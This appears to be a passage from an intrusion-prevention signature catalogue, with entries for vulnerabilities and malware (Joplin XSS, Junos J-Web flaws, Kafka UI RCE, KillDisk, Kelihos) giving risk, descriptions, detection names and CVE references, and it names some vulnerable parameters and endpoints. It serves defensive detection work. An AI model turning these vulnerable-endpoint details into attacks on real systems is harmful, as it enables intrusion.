The Webring component for Joomla! is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.

Situation:

HTTP_CRL-Joomla-Webring-Remote-Code-Injection-Compromise

References:

CVE-2006-4129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4129

BID-19492
http://www.securityfocus.com/bid/19492

Joplin-Mdtohtml-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Joplin Project Joplin

Risk:

Moderate

First detected in:

sgpkg-ips-1578-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Generic

Software:

Joplin

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in the MdToHtml component of Joplin. This vulnerability is due to improper validation and escaping of the language selector in markdown code block element. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted markdown document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.

Situation:

File-Text_Joplin-Mdtohtml-Cross-Site-Scripting

References:

CVE-2022-45598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45598

Jorani-Unauthenticated-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Jorani detected

Risk:

High

First detected in:

sgpkg-ips-1669-5242

Last changed:

sgpkg-ips-1669-5242

Platform:

Generic

Software:

Jorani

Type:

Input Validation

Description:

A vulnerability in Jorani, versions before 1.0.2, which allows remote attackers to execute arbitrary code by using a path traversal, due to insufficient input validation.

Situation:

HTTP_CRL-Jorani-Unauthenticated-Remote-Code-Execution

References:

CVE-2023-26469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26469

JPEG_Data-After-End-Of-Image-Marker

About this vulnerability:	Data after the JPEG End-Of-Image marker
Risk:	Moderate
First detected in:	sgpkg-ips-666-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	The end of a JPEG file is marked with the End-Of-Image marker. Some malware inject data after the marker to use as a communication channel.

JPG-Gdiplus-DLL-Comment-Buffer-Overflow

About this vulnerability:

gdiplus.dll buffer overflow with invalid comment length in jpeg images

Risk:

High

First detected in:

sgpkg-ips-10-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

The JPEG image parser gdiplus.dll contains a buffer overflow vulnerability. JPEG images with a comment section, which length is set as 0 or 1, will cause an integer underflow and possibly allow arbitrary code execution.

Situation:

HTTP_JPG-Gdiplus-DLL-Comment-Buffer-Overflow
E-Mail_JPG-Gdiplus-DLL-Comment-Buffer-Overflow
File-JPEG_JPG-Gdiplus-DLL-Comment-Buffer-Overflow

References:

CVE-2004-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0200

MS04-028
http://technet.microsoft.com/security/bulletin/MS04-028

jQuery-Cross-Site-Scripting-CVE-2020-11023

About this vulnerability:

A vulnerability in jQuery

Risk:

High

First detected in:

sgpkg-ips-1830-5242

Last changed:

sgpkg-ips-1830-5242

Platform:

Generic

Software:

jQuery

Type:

Cross-site Scripting

Description:

A cross site scripting vulnerability exists in jQuery versions between 1.0.3 and 3.4.1. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user into visiting a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user's browser.

Situation:

File-Text_jQuery-Cross-Site-Scripting-CVE-2020-11023

References:

CVE-2020-11023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11023

JSFuck-JavaScript-Obfuscation

About this vulnerability:	JSFuck Javascript obfuscation usage detected
Risk:	High
First detected in:	sgpkg-ips-1147-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Javascript Injection
Description:	JSFuck is valid Javascript code written using only six different characters. This makes the code highly obfuscated and it might allow to bypass restrictions or detections.
Situation:	File-Text_JSFuck-JavaScript-Obfuscation

JSON-Object-With-Unnecessarily-Escaped-Characters

About this vulnerability:	A suspicious JSON object detected
Risk:	High
First detected in:	sgpkg-ips-1774-5242
Last changed:	sgpkg-ips-1775-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	This fingerprint detects obfuscated JSON objects. Strings in JSON objects can be obfuscated using Unicode escaping. For example, character 'a' may be represented as "\u0061". Such obfuscated JSON values are usually used to bypass security filtering during attacks.
Situation:	File-Text_JSON-Object-With-Unnecessarily-Escaped-Characters

Judge0-Sandbox-Escape-CVE-2024-28189

About this vulnerability:

A vulnerability in Judge0

Risk:

Moderate

First detected in:

sgpkg-ips-1805-5242

Last changed:

sgpkg-ips-1805-5242

Platform:

Generic

Software:

Judge0

Type:

Input Validation

Description:

Improper validation of data sent to an API endpoint causes a sandbox escape vulnerability in Judge0. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Judge0-Sandbox-Escape-CVE-2024-28189

References:

CVE-2024-28189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28189

Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Juniper Networks' SSL-VPN Client

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Juniper Networks SSL-VPN Client

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Juniper Networks SSL-VPN Client. The vulnerability is due to an error in the setup ActiveX control. A particular setup parameter suffers insufficient input validation. An exploitation may lead to arbitrary code exectution in the context of the current user.

Situation:

HTTP_SS-Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow
File-Text_Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow

References:

CVE-2006-2086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2086

BID-17712
http://www.securityfocus.com/bid/17712

OSVDB-25001
http://www.osvdb.org/25001

Junos-OS-J-Web-Arbitrary-File-Upload-CVE-2023-36846

About this vulnerability:

An attempt to exploit a vulnerability in Junos OS detected

Risk:

High

First detected in:

sgpkg-ips-1629-5242

Last changed:

sgpkg-ips-1802-5242

Platform:

Junos OS

Software:

<os>

Type:

Input Validation

Description:

A missing authentication for critical function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request that does not require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity for a certain part of the file system. This vulnerability could be chained with CVE-2023-36845 to achieve remote code execution.

Situation:

HTTP_CRL-Junos-OS-J-Web-Arbitrary-File-Upload-PHP-External-Variable-Modification

References:

CVE-2023-36846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36846

Junos-OS-J-Web-PHP-External-Variable-Modification-CVE-2023-36845

About this vulnerability:

An attempt to exploit a vulnerability in Junos OS detected

Risk:

High

First detected in:

sgpkg-ips-1802-5242

Last changed:

sgpkg-ips-1802-5242

Platform:

Junos OS

Software:

<os>

Type:

Input Validation

Description:

A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on SRX Series allows an unauthenticated, remote attacker to execute code by modifying value of the PHPRC variable.

Situation:

HTTP_CRL-Junos-OS-J-Web-Arbitrary-File-Upload-PHP-External-Variable-Modification

References:

CVE-2023-36845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36845

Junos-OS-Local-File-Inclusion-CVE-2022-22246

About this vulnerability:

A vulnerability in Junos OS

Risk:

Moderate

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Junos OS

Software:

<os>

Type:

Input Validation

Description:

A local file inclusion vulnerability has been reported in the J-Web component of Junos OS. A remote attacker can use this vulnerability to execute PHP files located on the server.

Situation:

HTTP_CSU-Junos-OS-Local-File-Inclusion-CVE-2022-22246

References:

CVE-2022-22246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22246

Junos-OS-Path-Traversal-During-File-Upload-CVE-2022-22245

About this vulnerability:

An attempt to exploit a vulnerability in Junos OS detected

Risk:

High

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Junos OS

Software:

<os>

Type:

Input Validation

Description:

The vulnerability is caused by the lack of input validation in /Upload.php endpoint of Juniper's J-Web. As a result, an unauthenticated attacker could create files in any place on the server.

Situation:

HTTP_CRL_Junos-OS-Path-Traversal-During-File-Upload-CVE-2022-22245

References:

CVE-2022-22245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22245

Junos-OS-Phar-File-Deserialization-CVE-2022-22241

About this vulnerability:

A vulnerability in Junos OS

Risk:

High

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Junos OS

Software:

<os>

Type:

Input Validation

Description:

An input validation vulnerability has been reported in the J-Web component of Junos OS. A remote attacker can use this vulnerability to deserialize phar files, which then can be further leveraged to achieve remote code execution.

Situation:

HTTP_CRL-Junos-OS-Phar-File-Deserialization-CVE-2022-22241

References:

CVE-2022-22241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22241

Junos-Pre-Authenticated-Reflected-XSS-On-Error-Page-CVE-2022-22242

About this vulnerability:

An attempt to exploit a vulnerability in JunOS detected

Risk:

High

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Junos OS

Software:

<os>

Type:

Cross-site Scripting

Description:

The vulnerability is caused by the insecure use of the server name from the URI when generating the error page. It can be exploited by a remote unauthenticated attacker to steal JunOS admin sessions, or be used in combination with other vulnerabilities that require authentication.

Situation:

HTTP_CSU_Junos-Pre-Authenticated-Reflected-XSS-On-Error-Page-CVE-2022-22242

References:

CVE-2022-22242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22242

Kafka-UI-Remote-Code-Execution-CVE-2023-52251

About this vulnerability:

A vulnerability in Kafka UI

Risk:

High

First detected in:

sgpkg-ips-1681-5242

Last changed:

sgpkg-ips-1681-5242

Platform:

Generic

Software:

Kafka UI

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Kafka UI. The vulnerability is due to the lack of input validation of the q parameter in HTTP requests submitted to the messages endpoint.

Situation:

HTTP_CRL-Kafka-UI-Remote-Code-Execution-CVE-2023-52251

References:

CVE-2023-52251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52251

KaiXin-Exploit-Kit

About this vulnerability:	KaiXin Exploit Kit
Risk:	High
First detected in:	sgpkg-ips-1019-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	KaiXin is an exploit kit which has been known to target Asian web sites.
Situation:	File-Text_KaiXin-Exploit-Kit-Landing-Page

Kaltura-getUserzoneCookie-Code-Execution

About this vulnerability:

A vulnerability in Kaltura Community Edition

Risk:

Moderate

First detected in:

sgpkg-ips-1032-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Kaltura Community Edition

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in the Kaltura platform. A remote, unauthenticated user can use this to execute arbitrary code under the context of the web server user.

Situation:

HTTP_CRL-Kaltura-getUserzoneCookie-Code-Execution

References:

CVE-2017-14143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143

BID-100976
http://www.securityfocus.com/bid/100976

Kaltura-Remote-PHP-Code-Execution

About this vulnerability:	A vulnerability in Kaltura Community Edition
Risk:	Moderate
First detected in:	sgpkg-ips-1032-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Kaltura Community Edition
Type:	Malfunction
Description:	There exists a remote code execution vulnerability in the Kaltura platform. A remote, unauthenticated user can use this to execute arbitrary code under the context of the web server user.
Situation:	HTTP_CRL-Kaltura-Remote-PHP-Code-Execution

Kame-Ike-Racoon-Hash

About this vulnerability:

A vulnerability in NetBSD Project NetBSD

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

NetBSD

Software:

<os>

Type:

Malfunction

Description:

The IKE daemon of some BSD systems (OpenBSD's isakmpd, NetBSD's raccoon) has a vulnerability where sending specifically crafted IKE packets could remove an IPsec SA or all SAs. Once an attacker successfully executes an exploit, the ISAKMP SA(s) on the target will be removed. Moreover, a malicious attacker could successfully force the VPN gateway server to remove the SA of the peer and thus force both sides to try and re-establish the connection.

Situation:

Generic_Kame-Ike-Racoon-Hash

References:

CVE-2004-0164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0164

BID-9417
http://www.securityfocus.com/bid/9417

BID-9416
http://www.securityfocus.com/bid/9416

Kame-Racoon-X509-Certificate-Verification

About this vulnerability:

A vulnerability in Kame Project racoon

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

KAME racoon

Type:

Malfunction

Description:

The IKE daemon of KAME racoon has a vulnerability where an invalid X.509 certificate will be accepted as valid. This would allow an invalid certificate to be used to establish a security association with a KAME based VPN end-point. Once an attacker successfully executes an exploit, it is possible for the remote attacker to establish a trusted, secure connection with the target, over which traffic can be tunnelled to internal, unprotected systems.

Situation:

Generic_UDP-Kame-Racoon-X509-Certificate-Verification

References:

CVE-2004-0607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0607

BID-10546
http://www.securityfocus.com/bid/10546

OSVDB-7113
http://www.osvdb.org/7113

Karjasoft-Sami-FTP-Server-2.0.1-Username-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in KarjaSoft FTP Server 2.0.1

Risk:

High

First detected in:

sgpkg-ips-642-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

KarjaSoft Sami FTP Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in KarjaSoft FTP Server 2.0.1 and earlier. When an oversized username is given with the USER command, a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.

Situation:

References:

CVE-2006-0441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0441

BID-16370
http://www.securityfocus.com/bid/16370

Karjasoft-Sami-FTP-Server-2.0.2-Username-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in KarjaSoft FTP Server 2.0.2

Risk:

High

First detected in:

sgpkg-ips-643-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

KarjaSoft Sami FTP Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in KarjaSoft FTP Server 2.0.2. When an oversized username, or password, is given a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.

Situation:

FTP_CS-Karjasoft-Sami-FTP-Server-List-Command-Buffer-Overflow

References:

CVE-2006-2212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2212

BID-17835
http://www.securityfocus.com/bid/17835

OSVDB-25670
http://www.osvdb.org/25670

Karjasoft-Sami-FTP-Server-List-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in KarjaSoft Sami FTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-546-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

KarjaSoft Sami FTP Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Karjasoft Sami FTP Server. The vulnerability is caused by insufficient bounds checking while processing LIST command. By sending a crafted message to the target server, a remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code with the privileges of the vulnerable server.

Situation:

References:

BID-58247
http://www.securityfocus.com/bid/58247

OSVDB-90815
http://www.osvdb.org/90815

Kaseya-VSA-Arbitrary-File-Upload

About this vulnerability:

A Kaseya VSA Arbitrary File Upload vulnerability

Risk:

High

First detected in:

sgpkg-ips-776-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Kaseya VSA

Type:

Misconfiguration

Description:

A vulnerability in Kaseya VSA, versions 7 through 9.1, which allows remote attackers to upload ASP files to arbitrary directories leading to arbitrary code execution.

Situation:

HTTP_CSU-Kaseya-VSA-Arbitrary-File-Upload

References:

CVE-2015-6922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6922

Kaseya-VSA-SQL-Injection-Vulnerability-CVE-2017-18362

About this vulnerability:

An attempt to exploit a vulnerability in Kaseya VSA detected

Risk:

High

First detected in:

sgpkg-ips-1599-5242

Last changed:

sgpkg-ips-1599-5242

Platform:

Generic

Software:

Kaseya VSA

Type:

SQL Injection

Description:

ConnectWise ManagedITSync integration through 2017 for Kaseya VSA is vulnerable to unauthenticated remote commands that allow full direct access to the Kaseya VSA database. If the "ManagedIT.asmx" page is available via the Kaseya VSA web interface, anyone with access to the page is able to run arbitrary SQL queries, both read and write, without authentication.

Situation:

HTTP_CRL-Kaseya-VSA-SQL-Injection-Vulnerability-CVE-2017-18362

References:

CVE-2017-18362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18362

Kaskad-Dasever-Heap-Overflow

About this vulnerability:	A vulnerability in Kaskad Scada
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Kaskad Scada
Type:	Buffer Overflow
Description:	There is a heap buffer overflow vulnerability in in Kaskad Scada which allows remote attacker to execute malicious code on target system.
Situation:	Generic_UDP-Kaskad-Dasever-Heap-Overflow

Kaspersky-Anti-Virus-For-Linux-File-Server-Getreportstatus-Directory-Traversal

About this vulnerability:

A vulnerability in Kaspersky Labs Anti-Virus for Linux File Servers

Risk:

Moderate

First detected in:

sgpkg-ips-947-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Kaspersky Labs Anti-Virus for Linux File Servers

Type:

Directory Traversal

Description:

Improper validation of HTTP requests causes a directory traversal vulnerability in Kaspersky Anti-Virus for Linux File Server. A successful attack allows arbitrary files on the target system to be accessed remotely without authentication.

Situation:

HTTP_CRL-Kaspersky-Anti-Virus-For-Linux-File-Server-Getreportstatus-Directory-Traversal

References:

CVE-2017-9812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9812

Kaspersky-Internet-Security-HTTPS-Inspection-Insecure-Certificate-Validation

About this vulnerability:	A vulnerability in Kaspersky Labs Internet Security
Risk:	High
First detected in:	sgpkg-ips-709-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Kaspersky Labs Internet Security
Type:	Directory Traversal
Description:	There exists a vulnerability in Kaspersky Internet Security. A remote attacker can use this to accieve a directory traversal situation which can lead to code execution.
Situation:	HTTPS_SS-Kaspersky-Internet-Security-HTTPS-Inspection-Insecure-Certificate-Validation

Katello-Update-Roles-Missing-Authorization

About this vulnerability:

A Katello Update Roles Missing Authorization vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Katello

Type:

Insecure Configuration

Description:

A vulnerability in Katello, versions 1.5.0-14 and earlier, where authorization for the update_roles action is not checked, which allows remote attackers to gain privileges by setting a user account to an administrator account.

Situation:

HTTP_CRL-Katello-Update-Roles-Missing-Authorization

References:

CVE-2013-2143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2143

Keenvalue

About this vulnerability:	KeenValue
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	KeenValue
Type:	Misconfiguration
Description:	KeenValue is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Keenvalue HTTP_CSH-Keenvalue

Kelihos-Botnet

About this vulnerability:	Kelihos botnet
Risk:	High
First detected in:	sgpkg-ips-571-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Kelihos is a malicious botnet. The botnet primarily downloads malicious modules to send email spam and is thus considered one of the largest spam-sending botnets. However, Kelihos may download any arbitrary malicious module at any time and imposes a high security risk. Kelihos bots organize in peer-to-peer botnets, which are highly resilient due to the lack of single-point-of-failures.
Situation:	HTTP_CS-Kelihos-Traffic HTTP_CSU-Kelihos-Bot-Activity HTTP_CSH-Kelihos-Bot-Activity

Kemoge-Botnet

About this vulnerability:	Kemoge botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Kemoge is a malware that targets Andoird hosts.
Situation:	HTTP_CRL-Kemoge-Traffic

Kentico-CMS-Staging-SyncServer-Remote-Command-Execution

About this vulnerability:

A vulnerability in Kentico CMS

Risk:

High

First detected in:

sgpkg-ips-1254-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Kentico CMS

Type:

Input Validation

Description:

There exists a vulnerability in Kentico CMS, versions 12.0.14 and before, which allows remote attackers to execute arbitrary commands via unauthenticated XML requests to the Staging Service SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter.

Situation:

HTTP_CRL-Kentico-CMS-Staging-SyncServer-Remote-Command-Execution

References:

CVE-2019-10068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10068

Kerberos-Authentication-Failed

About this vulnerability:	Kerberos authentication failure
Risk:	Low
First detected in:	sgpkg-ips-236-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Failed Login
Description:	Kerberos authentication failed. Large numbers of failed logins originating from the same network host may indicate password brute force attacks. Also certain services lock user accounts after a predefined number of failed login attempts, allowing remote attackers to cause a denial of service for users by repeated login attempts.
Situation:	Generic_Kerberos-Authentication-Failed

Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

High

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in Kerberos. The vulnerability is due to a NULL pointer dereference within the "process_tgs_req()" function because an unusual failure condition causes a helper function to return success. A remote authenticated attacker can exploit this vulnerability by sending an unusual but valid TGS-REQ to a KDC serving a realm with a single-component name.

Situation:

Generic_CS-Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service
Generic_UDP-Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service

References:

CVE-2013-1417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1417

OSVDB-100077
http://www.osvdb.org/100077

Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

Moderate

First detected in:

sgpkg-ips-553-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Kerberos. The vulnerability is due to a NULL pointer dereference within the setup_server_realm() function when Kerberos is configured to serve multiple realms. A remote attacker can exploit this vulnerability by sending a malicious request to a vulnerable installation of Kerberos. Successful exploitation will cause the krb5kdc daemon to terminate resulting in a denial of service condition.

Situation:

Generic_CS-Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service
Generic_UDP-Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service

References:

CVE-2013-1418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1418

OSVDB-99508
http://www.osvdb.org/99508

Kerio-Control-Crlf-Injection-CVE-2024-52875

About this vulnerability:

An attempt to exploit a vulnerability in Kerio Control detected

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

Kerio Control

Type:

Input Validation

Description:

An issue was discovered in GFI Kerio Control 9.2.5 through 9.4.5. The "dest" parameter passed to the "/nonauth/addCertException.cs", "/nonauth/guestConfirm.cs" and "/nonauth/expiration.cs" pages is not properly sanitized before being used to generate a Location HTTP header in a 302 HTTP response. This can be exploited to perform Open Redirect or HTTP Response Splitting attacks, which in turn lead to Reflected Cross-Site Scripting (XSS). Remote command execution can be achieved by leveraging the upgrade feature in the admin interface.

Situation:

HTTP_CSU-Kerio-Control-Crlf-Injection-CVE-2024-52875

References:

CVE-2024-52875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-52875

Kerio-Personal-Firewall-Buffer-Overflow

About this vulnerability:

Stack buffer overflow in Kerio Personal Firewall administration authentication process

Risk:

High

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4;Windows XP SP0;Windows XP SP1

Software:

Kerio Personal Firewall

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability in Kerio Personal Firewall authentication process which allows a remote attacker to execute arbitrary code via a handshake packet.

Situation:

Generic_CS-Kerio-Personal-Firewall-Buffer-Overflow

References:

CVE-2003-0220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0220

BID-7180
http://www.securityfocus.com/bid/7180

OSVDB-6294
http://www.osvdb.org/6294

KeyBase-Keylogger-C2-Traffic

About this vulnerability:	Traffic resembling KeyBase keylogger was detected
Risk:	High
First detected in:	sgpkg-ips-1053-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	KeyBase keylogger traffic was detected. KeyBase is a keylogger malware family, which features are mainly limited to keylogging and password stealing.
Situation:	HTTP_CSU-KeyBase-Keylogger-C2-Traffic

Keysight-N6854a-And-N6841a-RF-Addlicensefile-Directory-Traversal

About this vulnerability:

A vulnerability in KeySight N6854A and N6841A RF

Risk:

High

First detected in:

sgpkg-ips-1520-5242

Last changed:

sgpkg-ips-1520-5242

Platform:

Generic

Software:

KeySight N6854A and N6841A RF

Type:

Directory Traversal

Description:

A directory traversal exists in KeySight N6854A and N6841A RF Sensor. The vulnerability is due to input validation error which results in upload of malicious files at arbitrary locations on the target server. A remote, unauthenticated attacker can exploit this vulnerability by sending maliciously crafted packets to the target server. Successful exploitation could result in execution of arbitrary code on the target server in the context of SYSTEM.

Situation:

File-Binary_Keysight-N6854a-And-N6841a-RF-Addlicensefile-Directory-Traversal

References:

CVE-2022-38129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38129

Keysight-N6854a-And-N6841a-RF-Sensor-Directory-Traversal

About this vulnerability:

A vulnerability in KeySight N6854A and N6841A RF

Risk:

High

First detected in:

sgpkg-ips-1478-5242

Last changed:

sgpkg-ips-1478-5242

Platform:

Generic

Software:

KeySight N6854A and N6841A RF

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in KeySight N6854A and N6841A RF Sensor. This vulnerability is due to incomplete input sanitization in Java class UserFirmwareRequestHandler. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation could read arbitrary files on the target server under the security context of the SYSTEM.

Situation:

HTTP_CSU-Keysight-N6854a-And-N6841a-RF-Sensor-Directory-Traversal

References:

CVE-2022-1661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1661

Keysight-N6854a-And-N6841a-RF-Sensor-Insecure-Deserialization

About this vulnerability:

A vulnerability in KeySight N6854A and N6841A RF

Risk:

Moderate

First detected in:

sgpkg-ips-1476-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Generic

Software:

KeySight N6854A and N6841A RF

Type:

Input Validation

Description:

Insecure deserialization of Java objects causes a vulnerability in the KeySight N6854A and N6841A RF Sensor. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-Keysight-N6854a-And-N6841a-RF-Sensor-Insecure-Deserialization

References:

CVE-2022-1660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1660

Keysight-N6854a-And-N6841a-RF-Sensor-smsRestoreDatabaseZip-SQL-Injection

About this vulnerability:

A vulnerability in KeySight N6854A and N6841A RF Sensor.

Risk:

High

First detected in:

sgpkg-ips-1527-5242

Last changed:

sgpkg-ips-1527-5242

Platform:

Windows

Software:

KeySight N6854A and N6841A RF

Type:

Input Validation

Description:

A vulnerability in KeySight N6854A and N6841A RF Sensor, versions 2.4.0 and before, which allows remote attackers to execute arbitrary code by sending maliciously crafted packets to the target server due to insufficient input validation when restoring databases from arbitrary network locations.

Situation:

HTTP_CRL-Keysight-N6854a-And-N6841a-RF-Sensor-smsRestoreDatabaseZip-SQL-Injection

References:

CVE-2022-38130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38130

Kibana-Upgrade-Assistant-Telemetry-Collector-Prototype-Pollution

About this vulnerability:	A vulnerability in Elastic Kibana detected
Risk:	High
First detected in:	sgpkg-ips-1652-5242
Last changed:	sgpkg-ips-1652-5242
Platform:	Generic
Software:	ElasticSearch
Type:	Input Validation
Description:	A vulnerability in Elastic Kibana, before before version 7.6.3, which allows remote attackers to execute arbitrary code by setting a new constructor.prototype.sourceURL value.
Situation:	HTTP_CRL-Kibana-Upgrade-Assistant-Telemetry-Collector-Prototype-Pollution

KillDisk-Binary-File

About this vulnerability:	KillDisk binary file was detected
Risk:	High
First detected in:	sgpkg-ips-1080-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Killdisk is a disk wiping malware. First, it scrambles found files and then deletes them. After deleting the files, boot records are overwritten to make disk partitions unusable. This situation might be also triggered by other malicious executables.
Situation:	File-Exe_KillDisk-Malware-Binary-File

Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262

About this vulnerability:

A vulnerability in Kingsoft WPS Office

Risk:

High

First detected in:

sgpkg-ips-1784-5242

Last changed:

sgpkg-ips-1784-5242

Platform:

Windows

Software:

Kingsoft WPS Office

Type:

Input Validation

Description:

